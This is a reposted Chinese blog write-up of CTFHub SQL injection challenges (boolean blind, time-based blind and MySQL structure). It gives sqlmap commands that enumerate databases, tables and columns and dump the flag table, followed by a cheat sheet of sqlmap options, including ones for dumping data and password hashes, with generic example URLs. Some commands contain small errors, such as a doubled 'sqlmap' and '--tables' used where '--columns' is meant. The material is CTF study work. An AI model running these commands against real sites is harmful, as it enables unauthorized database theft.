sqlmap使用
布尔盲注
python3 sqlmap.py -u "CTFHub 环境实例 | 提示信息" --current-db --batch
这里可以看出 sqlmap爆出了数据库名sqli
python3 sqlmap.py -u "CTFHub 环境实例 | 提示信息" --current-db --batch -D sqli --tables
然后我们在查看数据库里的表名
这里爆出了表名 news和flag 我们继续查看表flag里的字段
python3 sqlmap.py -u "CTFHub 环境实例 | 提示信息" -T flag --columns
接下来查看flag表里的全部数据
python3 sqlmap.py -u "CTFHub 环境实例 | 提示信息" -T flag --dump
就得到了flag
这道题是时间盲注
python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" --current-db --batch
还是先爆出数据库名
python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" -D sqli --tables --batch
python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" -D sqli -T flag --columns --batch
查看flag里的全部字段
python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" -D sqli -T flag --dump --batch
就得到了flag
第三道题是mysql结构 但我们依旧使用sqlmap
python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" --current-db --batch
依旧是sqli的数据库然后爆出表名
python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" -D sqli --tables --batch
然后再查看表里的数据
python3 sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" -D sqli -T hlxepzysxe --columns --batch
我们查看表里的全部字段
sqlmap.py sqlmap -u "CTFHub 环境实例 | 提示信息" --batch -T hlxepzysxe --dump
就得到了flag
sqlmap详细命令:
-is-dba 当前用户权限(是否为root权限)
-dbs 所有数据库
-current-db 网站当前数据库
-users 所有数据库用户
-current-user 当前数据库用户
-random-agent 构造随机user-agent
-passwords 数据库密码
快速入门;SQLmap(常规)使用步骤
检测「注入点」 sqlmap -u 'http://xx/?id=1'
查看所有「数据库」 sqlmap -u 'http://xx/?id=1' --dbs
查看当前使用的数据库 sqlmap -u 'http://xx/?id=1' --current-db
查看「数据表」 sqlmap -u 'http://xx/?id=1' -D 'security' --tables
查看「字段」 sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --tables
查看「数据」sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --dump
原文地址:https://blog.csdn.net/2403_87533599/article/details/145180900
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!